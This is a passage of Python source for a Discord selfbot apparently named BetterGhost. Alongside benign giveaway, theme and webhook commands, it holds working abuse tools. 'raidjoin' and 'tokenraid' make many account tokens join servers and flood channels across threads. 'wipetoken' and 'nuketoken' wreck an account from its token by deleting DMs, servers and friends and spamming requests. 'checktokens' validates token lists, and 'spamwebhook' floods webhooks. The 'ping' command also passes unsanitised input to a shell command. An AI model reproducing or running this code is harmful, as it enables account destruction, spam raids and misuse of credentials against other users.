embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="raidjoin", description="Make all your account tokens join a server.", usage="raidjoin [delay] [invite]")
async def raidjoin(ctx, delay:int = 3, *, invite: str):
if __riskmode__:
print_info(f"Trying to join server with tokens every {delay} seconds.")
for Token in open("data/tokens.txt", "r").readlines():
Token = Token.replace("\n", "")
userAgent = get_random_user_agent()
request = requests.post(f"https://discord.com/api/v9/invites/{invite}", headers={
"Authorization": Token,
"accept": "*/*",
"accept-language": "en-US",
"connection": "keep-alive",
"cookie": f"__cfduid={os.urandom(43).hex()}; __dcfduid={os.urandom(32).hex()}; locale=en-US",
"DNT": "1",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"referer": "https://discord.com/channels/@me",
"TE":"Trailers ",
"User-Agent": userAgent,
"X-Super-Properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAxIiwib3NfdmVyc2lvbiI6IjEwLjAuMTkwNDIiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiY2xpZW50X2J1aWxkX251bWJlciI6ODMwNDAsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9"
})
if request.status_code == 200:
print_info(f"Joined successfully.")
else:
print_info("Failed to join.")
try:
print_info("Accepted guild rules.")
requests.put(f"https://discord.com/api/guilds/{request['guild']['id']}/requests/@me", headers={"Authorization": Token, "User-Agent": userAgent, "Content-Type": "application/json"}, data=json.dumps({}))
except:
print_info("Couldnt accept guild rules")
await asyncio.sleep(delay)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="tokenraid", description="Raid a server with all your account tokens.", usage="tokenraid [threads] [amount] [channel id] (message)")
async def tokenraid(ctx, threadsAmount:int, amount: int, channel_id: int = None, *, text = None):
if __riskmode__:
await ctx.message.delete()
tokens = []
for token in open("data/tokens.txt", "r").readlines():
tokens.append(token.replace("\n", ""))
def raid():
def sendMessages():
message = text
print_info("Started new thread.")
for _ in range(amount):
requests.post(f"https://discord.com/api/channels/{channel_id}/messages", headers={"Authorization": random.choice(tokens), "User-Agent": get_random_user_agent(), "Content-Type": "application/json"}, data=json.dumps({
"content": message + f" [{random.randint(1000, 9999)}]"
}))
print_info("Raid has begun.")
threads = []
for _ in range(threadsAmount):
thread = threading.Thread(target=sendMessages())
threads.append(thread)
threads[_].start()
for thread in threads:
thread.join()
print_info("Raid finished.")
BetterGhost.loop.create_task(raid())
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="checktoken", description="Checks if a token is working.", usage="checktoken [token]")
async def checktoken(ctx, *, token):
tokens = [token]
valid = "invalid"
message = await ctx.send("Starting check, read console for more information.")
print_info("Checking the token you gave...")
for token in tokens:
request = requests.get("https://discord.com/api/users/@me/library", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
if request.status_code != 200:
valid = "invalid"
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cRed}[INVALID] {fg.cWhite}{token}")
else:
valid = "valid"
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cGreen}[VALID] {fg.cWhite}{token}")
await message.edit(content="Check complete, read console for more information.", delete_after=__deletetimeout__)
print_info(f"Check complete, the token is {valid}.")
@BetterGhost.command(name="checktokens", description="Checks if your tokens are working.", usage="checktokens")
async def checktokens(ctx):
tokens = []
validTokens = []
invalidTokens = []
message = await ctx.send("Starting check, read console for more information.")
print_info("Checking your tokens has started.")
for token in open("data/tokens.txt", "r").readlines():
tokens.append(token.replace("\n", ""))
for token in tokens:
request = requests.get("https://discord.com/api/users/@me/library", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
if request.status_code != 200:
invalidTokens.append(token)
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cRed}[INVALID] {fg.cWhite}{token}")
else:
validTokens.append(token)
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cGreen}[VALID] {fg.cWhite}{token}")
open("data/valid-tokens.txt", "w").write('\n'.join(validTokens))
open("data/invalid-tokens.txt", "w").write('\n'.join(invalidTokens))
await message.edit(content="Check complete, read console for more information.", delete_after=__deletetimeout__)
print_info("Check complete.")
print_info(f"Valid tokens: {len(validTokens)} (Saved to data/valid-tokens.txt)")
print_info(f"Invalid tokens: {len(invalidTokens)} (Saved to data/invalid-tokens.txt)")
@BetterGhost.command(name="wipetoken", description="Completely wipe a token.", aliases=["cleantoken"])
async def wipetoken(ctx, token):
try:
await ctx.message.delete()
except:
pass
await ctx.send("Check console for more info...", delete_after=__deletetimeout__)
def closeDms():
try:
dms = requests.get("https://discord.com/api/users/@me/channels", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for dm in dms:
try:
requests.delete(f"https://discord.com/api/channels/{dm['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def leaveServers():
try:
guilds = requests.get("https://discord.com/api/users/@me/guilds", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for guild in guilds:
try:
requests.delete(f"https://discord.com/api/guilds/{guild['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def removeFriends():
try:
friends = requests.get("https://discord.com/api/users/@me/relationships", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for friend in friends:
try:
requests.delete(f"https://discord.com/api/users/@me/relationships/{friend['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
threading.Thread(target=closeDms).start()
threading.Thread(target=leaveServers).start()
threading.Thread(target=removeFriends).start()
@BetterGhost.command(name="nuketoken", description="Nuke a token.", usage="nuketoken [token]", aliases=["tokennuke"])
async def nuketoken(ctx, token):
try:
await ctx.message.delete()
except:
pass
await ctx.send("Check console for more info...", delete_after=__deletetimeout__)
def themeSpammer():
themes = ["dark", "light"]
for i in range(999999999):
requests.patch("https://discord.com/api/users/@me/settings", headers={"Authorization": token, "User-Agent": get_random_user_agent(), "Content-Type": "application/json"}, data=json.dumps({
"theme": random.choice(themes)
}))
def closeDms():
try:
dms = requests.get("https://discord.com/api/users/@me/channels", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for dm in dms:
try:
requests.delete(f"https://discord.com/api/channels/{dm['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def leaveServers():
try:
guilds = requests.get("https://discord.com/api/users/@me/guilds", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for guild in guilds:
try:
requests.delete(f"https://discord.com/api/guilds/{guild['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def removeFriends():
try:
friends = requests.get("https://discord.com/api/users/@me/relationships", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for friend in friends:
try:
requests.delete(f"https://discord.com/api/users/@me/relationships/{friend['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def createGuilds():
while True:
requests.post("https://discord.com/api/guilds", headers={"Authorization": token, "User-Agent": get_random_user_agent(), "Content-Type": "application/json"}, data=json.dumps({
"name": "EPIC GAMERS"
}))
threading.Thread(target=themeSpammer).start()
threading.Thread(target=closeDms).start()
threading.Thread(target=leaveServers).start()
threading.Thread(target=removeFriends).start()
threading.Thread(target=createGuilds).start()
@BetterGhost.command(name="gstart", description="Start a giveaway in the same channel", usage="gstart [duration] [winners] [prize]", aliases=["giveawaystart", "startgiveaway"])
async def gstart(ctx, duration=None, winners: int = None, *, prize=None):
if duration is not None:
if winners is not None:
if prize is not None:
if duration.endswith("m"):
duration = duration[:-1]
time = int(duration) * 60
timemins = time // 60
timepretty = f"{timemins} minute(s)"
elif duration.endswith("s"):
duration = duration[:-1]
time = int(duration)
timepretty = f"{time} second(s)"
elif duration.endswith("h"):
duration = duration[:-1]
time = int(duration) * 3600
timehrs = time // 3600
timepretty = f"{timehrs} hour(s)"
else:
if duration.endswith("s") or duration.endswith("m") or duration.endswith("h"):
duration = duration[:-1]
time = int(duration)
timepretty = f"{time} second(s)"
e = discord.Embed(
description=f"React with 🎉 to enter!\nEnds in {timepretty}\nHosted by {ctx.author.mention}",
color=__embedcolour__)
if winners >= 2:
e.set_footer(text=f"{winners} winners | Ends at")
else:
e.set_footer(text="1 winner | Ends at")
e.set_author(name=prize)
future = datetime.now() + timedelta(seconds=time)
e.timestamp = future
msg = await ctx.send("🎉 **GIVEAWAY** 🎉", embed=e)
await msg.add_reaction('\U0001F389')
await asyncio.sleep(time)
channelMsgHistory = await ctx.channel.history(limit=500).flatten()
for message in channelMsgHistory:
if message.id == msg.id:
msg = message
#running = False
if "🎉 **GIVEAWAY** 🎉" in msg.content:
entries = []
reactions = msg.reactions
for reaction in reactions:
users = await reaction.users().flatten()
for user in users:
entries.append(f"<@{user.id}>")
entries.remove(f"<@{BetterGhost.user.id}>")
nowinner = False
if entries != []:
nowinner = False
winnerslist = []
if winners >= 2:
for _ in range(winners):
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
nowinner = True
#running = True
if nowinner is True:
await ctx.send(f"A winner was not determined.\n{msg.jump_url}")
newe = discord.Embed(
description=f"A winner was not determined.\nHosted by {ctx.author.mention}",
color=0x36393F)
else:
await ctx.send("🎉 " + ', '.join(winnerslist) + f" you won **{prize}**\n{msg.jump_url}")
newe = discord.Embed(
description=', '.join(winnerslist) + f" won!\nHosted by {ctx.author.mention}",
color=0x36393F)
newe.set_author(name=prize)
if winners >= 2:
newe.set_footer(text=f"{winners} winners | Ended at")
else:
newe.set_footer(text="1 winner | Ended at")
future = datetime.now() + timedelta(seconds=time)
newe.timestamp = future
await msg.edit(content="🎉 **GIVEAWAY ENDED** 🎉", embed=newe)
#elif "🎉 **GIVEAWAY ENDED** 🎉" in msg.content:
#running = False
else:
await ctx.send(
f"❌ **Incorrect Syntax**\nTry: `{BetterGhost.command_prefix}gstart 30m 1 Awesome T-Shirt`")
else:
await ctx.send(f"❌ **Incorrect Syntax**\nTry: `{BetterGhost.command_prefix}gstart 30m 1 Awesome T-Shirt`")
else:
await ctx.send(f"❌ **Incorrect Syntax**\nTry: `{BetterGhost.command_prefix}gstart 30m 1 Awesome T-Shirt`")
@BetterGhost.command(name="gend", description="End a giveaway", usage="gend [message id]", aliases=["giveawayend", "endgiveaway"])
async def gend(ctx, id: int = None):
#running = False
msgId = ""
msgAuthorId = ""
msgContent = ""
channelMsgHistory = await ctx.channel.history(limit=500).flatten()
#print(channelMsgHistory)
for message in channelMsgHistory:
#print(message.id)
if message.id == id:
msgId = message.id
msgAuthorId = message.author.id
msgContent = message.content
msg = message
#print("Fetched Message ID: " + str(msgId))
#print("Looking for Message ID: " + str(id))
#print("Message author ID: " + str(msgAuthorId))
#print("Bot user ID: " + str(BetterGhost.user.id))
if msgId == id and msgAuthorId == BetterGhost.user.id:
if "🎉 **GIVEAWAY** 🎉" in msgContent:
#running = True
embeds = msg.embeds
for embed in embeds:
embed_dict = embed.to_dict()
entries = []
reactions = msg.reactions
for reaction in reactions:
users = await reaction.users().flatten()
for user in users:
entries.append(f"<@{user.id}>")
entries.remove(f"<@{BetterGhost.user.id}>")
nowinner = False
if "winners" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winners | Ends at", "")
elif "winner" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winner | Ends at", "")
prize = embed_dict['author']['name']
if entries != []:
nowinner = False
winnerslist = []
if int(winners) >= 2:
for _ in range(int(winners)):
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
nowinner = True
if nowinner is True:
await ctx.send(f"A winner was not determined.\n{msg.jump_url}")
newe = discord.Embed(
description=f"A winner was not determined.\nHosted by {ctx.author.mention}", color=0x36393F)
else:
await ctx.send("🎉 " + ', '.join(winnerslist) + f" you won **{prize}**\n{msg.jump_url}")
newe = discord.Embed(
description=', '.join(winnerslist) + f" won!\nHosted by {ctx.author.mention}",
color=0x36393F)
newe.set_author(name=embed_dict['author']['name'])
if int(winners) >= 2:
newe.set_footer(text=f"{winners} winners | Ended at")
else:
newe.set_footer(text=f"{winners} winner | Ended at")
newe.timestamp = datetime.now()
await msg.edit(content="🎉 **GIVEAWAY ENDED** 🎉", embed=newe)
elif "🎉 **GIVEAWAY ENDED** 🎉" in msgContent:
#running = False
await ctx.send("😔 That giveaway has already ended.")
else:
await ctx.send("That is not a giveaway.")
else:
await ctx.send("That is not a giveaway.")
@BetterGhost.command(name="greroll", description="Re-roll a giveaway", usage="greroll [message id]", aliases=["giveawayreroll", "rerollgiveaway"])
async def greroll(ctx, id: int = None):
#running = False
channelMsgHistory = await ctx.channel.history(limit=500).flatten()
for message in channelMsgHistory:
if message.id == id:
msg = message
if msg.author.id == BetterGhost.user.id:
if "🎉 **GIVEAWAY** 🎉" in msg.content:
#running = True
await ctx.send("You can't re-roll a running giveaway.")
elif "🎉 **GIVEAWAY ENDED** 🎉" in msg.content:
#running = False
embeds = msg.embeds
for embed in embeds:
embed_dict = embed.to_dict()
entries = []
reactions = msg.reactions
for reaction in reactions:
users = await reaction.users().flatten()
for user in users:
entries.append(f"<@{user.id}>")
entries.remove(f"<@{BetterGhost.user.id}>")
nowinner = False
if "winners" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winners | Ended at", "")
elif "winner" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winner | Ended at", "")
prize = embed_dict['author']['name']
if entries != []:
nowinner = False
winnerslist = []
if int(winners) >= 2:
for _ in range(int(winners)):
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
nowinner = True
if nowinner is True:
await ctx.send(f"A winner was not determined.\n{msg.jump_url}")
else:
await ctx.send("🎉 " + ', '.join(winnerslist) + f" you won **{prize}**\n{msg.jump_url}")
else:
await ctx.send("That is not a giveaway.")
else:
await ctx.send("That is not a giveaway.")
typing = False
@BetterGhost.command(name="typing", description="Start or stop typing.", usage="typing [start/stop]", aliases=["inftyping", "infintetyping"])
async def typing__(ctx, action = None):
global typing
if action == "start" or action == "Start":
await ctx.send("Started typing.")
typing = True
while typing is True:
async with ctx.typing():
await asyncio.sleep(1)
if typing is False:
break
elif action == "stop" or action == "Stop":
await ctx.send("Stopped typing.")
typing = False
elif action is None:
pass
@BetterGhost.command(name="sounds", description="Toggle BetterGhost notification sounds.", usage="sounds", aliases=["togglesounds", "soundstoggle"])
async def sounds(ctx):
cfg = Config.getConfig()
if cfg["sounds"]:
cfg["sounds"] = False
else:
cfg["sounds"] = True
Config.saveConfig(cfg)
await ctx.send(f"Sounds set to `{cfg['sounds']}`.")
@BetterGhost.command(name="notifications", description="Toggle BetterGhost notifications.", usage="notifications", aliases=["togglenotifications", "notificationstoggle"])
async def notifications(ctx):
cfg = Config.getConfig()
if cfg["toastnotifications"]:
cfg["toastnotifications"] = False
else:
cfg["toastnotifications"] = True
Config.saveConfig(cfg)
await ctx.send(f"Notifications set to `{cfg['toastnotifications']}`.")
@BetterGhost.command(name="ping", description="Ping a domain or ip address.", usage="ping [ip/domain]")
async def ping(ctx, *, dns):
message = await ctx.send("Pinging...")
output = subprocess.run(f"ping {dns}",text=True,stdout=subprocess.PIPE).stdout.splitlines()
values = "".join(output[-1:])[4:].split(", ")
minimum = values[0][len("Minimum = "):]
maximum = values[1][len("Maximum = "):]
average = values[2][len("Average = "):]
address = output[1].replace(f"Pinging {dns} [", "").replace("] with 32 bytes of data:", "")
if __embedmode__:
embed = discord.Embed(title=f"{dns} ping..", color=__embedcolour__)
embed.add_field(name="IP Address", value=f"```{address}```", inline=False)
embed.add_field(name="Minimum", value=f"```{minimum}```", inline=False)
embed.add_field(name="Maximum", value=f"```{maximum}```", inline=False)
embed.add_field(name="Average", value=f"```{average}```", inline=False)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="Pong!", embed=embed, delete_after=__deletetimeout__)
else:
await message.edit(content=f"""```ini
[ {dns} ping.. ]
IP Address: {address}
Minimum: {minimum}
Maximum: {maximum}
Average: {average}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="cloneserver", description="Clone a server.", usage="cloneserver", aliases=["copyserver"])
async def cloneserver(ctx):
serverName = ctx.guild.name
serverIcon = ctx.guild.icon
newGuild = await BetterGhost.create_guild(serverName)
print_info(f"Created new guild.")
newGuildDefaultChannels = await newGuild.fetch_channels()
for channel in newGuildDefaultChannels:
await channel.delete()
for channel in ctx.guild.channels:
if str(channel.type).lower() == "category":
try:
await newGuild.create_category(channel.name, overwrites=channel.overwrites, position=channel.position)
print_info(f"Created new category : {channel.name}")
except:
pass
for channel in ctx.guild.voice_channels:
try:
cat = ""
for category in newGuild.categories:
if channel.category.name == category.name:
cat = category
await newGuild.create_voice_channel(channel.name, category=cat, overwrites=channel.overwrites, topic=channel.topic, slowmode_delay=channel.slowmode_delay, nsfw=channel.nsfw, position=channel.position)
print_info(f"Created new voice channel : {channel.name}")
except:
pass
for channel in ctx.guild.stage_channels:
try:
cat = ""
for category in newGuild.categories:
if channel.category.name == category.name:
cat = category
await newGuild.create_stage_channel(channel.name, category=cat, overwrites=channel.overwrites, topic=channel.topic, slowmode_delay=channel.slowmode_delay, nsfw=channel.nsfw, position=channel.position)
print_info(f"Created new stage channel : {channel.name}")
except:
pass
for channel in ctx.guild.text_channels:
try:
cat = ""
for category in newGuild.categories:
if channel.category.name == category.name:
cat = category
await newGuild.create_text_channel(channel.name, category=cat, overwrites=channel.overwrites, topic=channel.topic, slowmode_delay=channel.slowmode_delay, nsfw=channel.nsfw, position=channel.position)
print_info(f"Created new text channel : {channel.name}")
except:
pass
for role in ctx.guild.roles[::-1]:
if role.name != "@everyone":
try:
await newGuild.create_role(name=role.name, color=role.color, permissions=role.permissions, hoist=role.hoist, mentionable=role.mentionable)
print_info(f"Created new role : {role.name}")
except:
pass
await ctx.send(f"Made a clone of `{ctx.guild.name}`.")
@BetterGhost.command(name="webhooksetup", description="Create a new server with webhooks.", usage="webhooksetup", aliases=["setupwebhooks"])
async def webhooksetup(ctx):
global __nitrowebhook__, __privnotewebhook__, __giveawaywebhook__, __ghostpingwebhook__, __friendsupdatewebhook__, __dmtypingwebhook__, __guildleavewebhook__, __selfbotwebhook__, __ticketswebhook__
iconFile = open("data/icon.png", "rb")
icon = bytes(iconFile.read())
configFile = json.load(open("config.json"))
guild = await BetterGhost.create_guild("BetterGhost Notifications", icon=icon)
newGuildDefaultChannels = await guild.fetch_channels()
for channel in newGuildDefaultChannels:
await channel.delete()
for channel in guild.text_channels:
await channel.delete()
for channel in guild.voice_channels:
await channel.delete()
for channel in guild.categories:
await channel.delete()
category = await guild.create_category_channel("Webhooks")
nitroWebhookChannel = await category.create_text_channel("nitro-sniper")
privnoteWebhookChannel = await category.create_text_channel("privnote-sniper")
giveawayWebhookChannel = await category.create_text_channel("giveaway-sniper")
ghostPingWebhookChannel = await category.create_text_channel("ghost-pings")
friendUpdatesWebhookChannel = await category.create_text_channel("friend-updates")
dmTypingWebhookChannel = await category.create_text_channel("dm-typing")
guildLeaveWebhookChannel = await category.create_text_channel("guild-leave")
selfbotsWebhookChannel = await category.create_text_channel("selfbots")
ticketsWebhookChannel = await category.create_text_channel("tickets")
nitroWebhook = await nitroWebhookChannel.create_webhook(name="BetterGhost Nitro Sniper")
privnoteWebhook = await privnoteWebhookChannel.create_webhook(name="BetterGhost Privnote Sniper")
giveawayWebhook = await giveawayWebhookChannel.create_webhook(name="BetterGhost Giveaway Sniper")
ghostPingWebhook = await ghostPingWebhookChannel.create_webhook(name="BetterGhost Pings")
friendUpdatesWebhook = await friendUpdatesWebhookChannel.create_webhook(name="Friend Updates")
dmTypingWebhook = await dmTypingWebhookChannel.create_webhook(name="DM Typing")
guildLeaveWebhook = await guildLeaveWebhookChannel.create_webhook(name="Guild Leave")
selfbotsWebhook = await selfbotsWebhookChannel.create_webhook(name="Selfbots")
ticketsWebhook = await ticketsWebhookChannel.create_webhook(name="Tickets")
__nitrowebhook__ = nitroWebhook.url
__privnotewebhook__ = privnoteWebhook.url
__giveawaywebhook__ = giveawayWebhook.url
__ghostpingwebhook__ = ghostPingWebhook.url
__friendsupdatewebhook__ = friendUpdatesWebhook.url
__dmtypingwebhook__ = dmTypingWebhook.url
__guildleavewebhook__ = guildLeaveWebhook.url
__selfbotwebhook__ = selfbotsWebhook.url
__ticketswebhook__ = ticketsWebhook.url
configFile["webhooks"]["nitro"] = __nitrowebhook__
configFile["webhooks"]["privnote"] = __privnotewebhook__
configFile["webhooks"]["giveaway"] = __giveawaywebhook__
configFile["webhooks"]["ghostping"] = __ghostpingwebhook__
configFile["webhooks"]["friendsupdate"] = __friendsupdatewebhook__
configFile["webhooks"]["dmtyping"] = __dmtypingwebhook__
configFile["webhooks"]["guildleave"] = __guildleavewebhook__
configFile["webhooks"]["selfbot"] = __selfbotwebhook__
configFile["webhooks"]["tickets"] = __ticketswebhook__
json.dump(configFile, open("config.json", "w"), sort_keys=False, indent=4)
if __embedmode__:
embed = discord.Embed(title="Webhook Setup", description=f"Created a new guild for your webhooks called `{guild.name}`.", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Created a new guild for your webhooks called `{guild.name}`.", delete_after=__deletetimeout__)
@BetterGhost.command(name="spamwebhook", description="Spam the shit out of a webhook.", usage="spamwebhook [amount] [url] (message)")
async def spamwebhook(ctx, amount: int, url, *, message = None):
if __embedmode__:
embed = discord.Embed(title="Spamming webhook...", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Spamming webhook...", delete_after=__deletetimeout__)
if message is None:
for _ in range(amount):
spamMsg = ''.join(random.choice(string.ascii_letters) for i in range(2000))
webhook = DiscordWebhook(url=url, content=spamMsg)
webhook.execute()
else:
for _ in range(amount):
webhook = DiscordWebhook(url=url, content=message)
webhook.execute()
if __embedmode__:
embed = discord.Embed(title="Finished spamming webhook", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Finished spamming webhook!", delete_after=__deletetimeout__)
@BetterGhost.command(name="newwebhook", description="Create a webhook in the command channel.", usage="newwebhook [name]", aliases=["createwebhook"])
async def newwebhook(ctx, *, name):
webhook = await ctx.channel.create_webhook(name=name)
if __embedmode__:
embed = discord.Embed(title=f"Created a webhook called {name}", description=f"URL: {webhook.url}", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Created a webhook called {name}\nURL: {webhook.url}", delete_after=__deletetimeout__)
@BetterGhost.command(name="delwebhook", description="Delete a webhook from the ID.", usage="delwebhook [id]", aliases=["deletewebhook", "removewebhook"])
async def delwebhook(ctx, id: int):
webhook = await BetterGhost.fetch_webhook(id)
await webhook.delete()
if __embedmode__:
embed = discord.Embed(title="Deleted the webhook", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Deleted the webhook", delete_after=__deletetimeout__)
@BetterGhost.command(name="webhookinfo", description="Information about the webhook.", usage="webhookinfo [id]", aliases=["webhooklookup", "lookupwebhook"])
async def webhookinfo(ctx, id: int):
webhook = await BetterGhost.fetch_webhook(id)
if __embedmode__:
embed = discord.Embed(title=f"{webhook.name} Information", colour=__embedcolour__)
embed.add_field(name="Webhook Name", value=f"```{webhook.name}```", inline=False)
embed.add_field(name="Webhook ID", value=f"```{webhook.id}```", inline=False)
embed.add_field(name="Webhook Guild", value=f"```{webhook.guild.name}```", inline=False)
embed.add_field(name="Webhook Channel", value=f"```{webhook.channel.name}```", inline=False)
embed.add_field(name="Webhook Token", value=f"```{webhook.token}```", inline=False)
embed.set_thumbnail(url=webhook.avatar_url)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ {webhook.name} Information ]
Webhook Name: {webhook.name}
Webhook ID: {webhook.id}
Webhook Guild: {webhook.guild.name}
Webhook Channel: {webhook.channel.name}
Webhook Token: {webhook.token}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="dumpchat", description="Get the chat's history.", usage="dumpchat [amount] (channel id) (oldest first, true/false)", aliases=["savechat", "chathistory"])
async def dumpchat(ctx, amount: int, channelId: int = None, oldestFirst: bool = False):
if channelId is None:
messages = await ctx.channel.history(limit=amount, oldest_first=oldestFirst).flatten()
f = open("chat_history.txt", "a")
try:
f.write(f"Chat history for #{ctx.channel.name} in {ctx.guild.name}\nSaved a total of {len(messages)} messages.\n \n")
except:
f.write(f"Saved a total of {len(messages)} messages.\n \n")
for msg in messages:
try:
f.write(f"[{msg.created_at.strftime('%m/%d/%Y, %H:%M:%S')}] {msg.author.name}#{msg.author.discriminator}: {msg.content}\n")
except:
pass
f.close()
await ctx.send("Generated the chat history.", file=discord.File("chat_history.txt"))
os.remove("chat_history.txt")
else:
channel = BetterGhost.get_channel(channelId)
messages = await channel.history(limit=amount, oldest_first=oldestFirst).flatten()
f = open("chat_history.txt", "a")
try:
f.write(f"Chat history for #{channel.name} in {channel.guild.name}\nSaved a total of {len(messages)} messages.\n \n")
except:
f.write(f"Saved a total of {len(messages)} messages.\n \n")
for msg in messages:
try:
f.write(f"[{msg.created_at.strftime('%m/%d/%Y, %H:%M:%S')}] {msg.author.name}#{msg.author.discriminator}: {msg.content}\n")
except:
pass
f.close()
await ctx.send("Generated the chat history.", file=discord.File("chat_history.txt"))
os.remove("chat_history.txt")
@BetterGhost.command(name="newtheme", description="Create a new theme with the given name.", usage="newtheme [name]", aliases=["createtheme"])
async def newtheme(ctx, *, name):
if not os.path.isfile(f'themes/{name}.json'):
name = name.replace(" ", "-")
f = open(f'themes/{name}.json', "w")
f.write("""
{
"embedtitle": "BetterGhost Recoded",
"embedcolour": "#708ffa",
"embedfooter": "",
"embedfooterimage": "",
"globalemoji": ":ghost:",
"embedimage": ""
}
""")
f.close()
if __embedmode__:
embed = discord.Embed(title="Theme create with the name " + name, colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Theme create with the name {name} ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="A theme with that name already exists", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ A theme with that name already exists ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="deltheme", description="Delete the named theme.", usage="deltheme [name]", aliases=["deletetheme", "removetheme"])
async def deltheme(ctx, *, name):
if not os.path.isfile(f'themes/{name}.json'):
if __embedmode__:
embed = discord.Embed(title="A theme with that name doesnt exist", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ A theme with that name doesnt exist ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
os.remove(f'themes/{name}.json')
if __embedmode__:
